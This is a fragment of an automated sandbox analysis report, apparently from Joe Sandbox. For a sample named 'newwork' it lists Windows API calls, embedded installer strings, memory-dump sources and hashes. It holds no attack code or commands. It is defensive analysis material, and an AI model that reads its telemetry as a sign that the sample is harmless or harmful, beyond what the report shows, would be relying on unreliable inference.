                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                        • String ID:
                                                                                        • API String ID: 4025006896-0
                                                                                        • Opcode ID: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                                                        • Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
                                                                                        • Opcode Fuzzy Hash: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                                                        • Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
                                                                                        APIs
                                                                                        • WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                        • CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                        • String ID:
                                                                                        • API String ID: 4071923889-0
                                                                                        • Opcode ID: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                        • Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
                                                                                        • Opcode Fuzzy Hash: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                        • Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
                                                                                        APIs
                                                                                        • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                                                        • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
                                                                                        • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
                                                                                        • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                        • String ID:
                                                                                        • API String ID: 3473537107-0
                                                                                        • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                        • Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
                                                                                        • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                        • Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 004705F1
                                                                                        Strings
                                                                                        • Failed to set NTFS compression state (%d)., xrefs: 00470602
                                                                                        • Unsetting NTFS compression on file: %s, xrefs: 004705D7
                                                                                        • Setting NTFS compression on file: %s, xrefs: 004705BF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                        • API String ID: 1452528299-3038984924
                                                                                        • Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                        • Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
                                                                                        • Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                        • Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
                                                                                        Strings
                                                                                        • Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
                                                                                        • Failed to set NTFS compression state (%d)., xrefs: 0046FE56
                                                                                        • Setting NTFS compression on directory: %s, xrefs: 0046FE13
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                        • API String ID: 1452528299-1392080489
                                                                                        • Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                        • Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
                                                                                        • Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                        • Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
                                                                                        • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
                                                                                        • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
                                                                                        • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                        • String ID:
                                                                                        • API String ID: 4283692357-0
                                                                                        • Opcode ID: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                        • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                                                        • Opcode Fuzzy Hash: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                        • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CountSleepTick
                                                                                        • String ID:
                                                                                        • API String ID: 2227064392-0
                                                                                        • Opcode ID: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                        • Instruction ID: 56d8cd0ebf6ab4a4d31aad6ab38b951dee0ff9c0bbbb70c30f4e079d31b44593
                                                                                        • Opcode Fuzzy Hash: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                        • Instruction Fuzzy Hash: C6E0ED6A30921149863131AE98CA6AF4D48CBC2324B28853FE08CE6283C89C4C0A867E
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                                                        • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                                                        • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                        • String ID:
                                                                                        • API String ID: 215268677-0
                                                                                        • Opcode ID: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                        • Instruction ID: 91f0679cb69370e855683a510bc75a037ced8834772831ea40795c83ba0b1c60
                                                                                        • Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                        • Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
                                                                                        APIs
                                                                                        • GetLastActivePopup.USER32(?), ref: 0042424C
                                                                                        • IsWindowVisible.USER32(?), ref: 0042425D
                                                                                        • IsWindowEnabled.USER32(?), ref: 00424267
                                                                                        • SetForegroundWindow.USER32(?), ref: 00424271
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                        • String ID:
                                                                                        • API String ID: 2280970139-0
                                                                                        • Opcode ID: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                        • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
                                                                                        • Opcode Fuzzy Hash: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                        • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                                                        APIs
                                                                                        • GlobalHandle.KERNEL32 ref: 0040626F
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                                        • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$AllocHandleLockUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 2167344118-0
                                                                                        • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                        • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                                        • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                        • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                                        APIs
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
                                                                                        Strings
                                                                                        • Failed to parse "reg" constant, xrefs: 0047A480
                                                                                        • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                        • API String ID: 3535843008-1938159461
                                                                                        • Opcode ID: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                        • Instruction ID: 25f2a786541cb687838a6194ffc4a73185deb9e5551b5ad8c851c0bf1152322b
                                                                                        • Opcode Fuzzy Hash: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                        • Instruction Fuzzy Hash: 22817274E00108AFCB10DF95D485ADEBBF9AF88344F50817AE814B7392D739AE05CB99
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
                                                                                        • SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
                                                                                        Strings
                                                                                        • Will not restart Windows automatically., xrefs: 004836F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ActiveForeground
                                                                                        • String ID: Will not restart Windows automatically.
                                                                                        • API String ID: 307657957-4169339592
                                                                                        • Opcode ID: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                        • Instruction ID: 4bdce942002d158aae482430f0c171f92fa141a3e9c551c877f01fd154286bbb
                                                                                        • Opcode Fuzzy Hash: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                        • Instruction Fuzzy Hash: 7F414870648240BFD321FF68DC92B6D3BE49718B09F6448B7E440573A2E37D9A059B1D
                                                                                        APIs
                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
                                                                                        • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
                                                                                        Strings
                                                                                        • Extracting temporary file: , xrefs: 004763EC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileTime$Local
                                                                                        • String ID: Extracting temporary file:
                                                                                        • API String ID: 791338737-4171118009
                                                                                        • Opcode ID: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                        • Instruction ID: 173659db1c42fed311bbc77dc24fc0b62308bfde4479aaaaa113f8cb774a82d8
                                                                                        • Opcode Fuzzy Hash: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                        • Instruction Fuzzy Hash: 9541B670E00649AFCB01DFA5C892AAFBBB9EB09704F51847AF814A7291D7789905CB58
                                                                                        Strings
                                                                                        • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
                                                                                        • Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                        • API String ID: 0-1974262853
                                                                                        • Opcode ID: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                        • Instruction ID: bcb3787111d781b294161d03010f6e791927551fc3c7e501f8e48cd77162cd73
                                                                                        • Opcode Fuzzy Hash: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                        • Instruction Fuzzy Hash: A531C430604204DFD711EB59D9C5BA977F5EB06304F5500BBF448AB392D7786E40CB49
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
                                                                                        Strings
                                                                                        • %s\%s_is1, xrefs: 00478F10
                                                                                        • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                        • API String ID: 47109696-1598650737
                                                                                        • Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                        • Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
                                                                                        • Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                        • Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                                                        • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExecuteMessageSendShell
                                                                                        • String ID: open
                                                                                        • API String ID: 812272486-2758837156
                                                                                        • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                        • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                                                        • Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                        • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                                                        APIs
                                                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                                                        • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
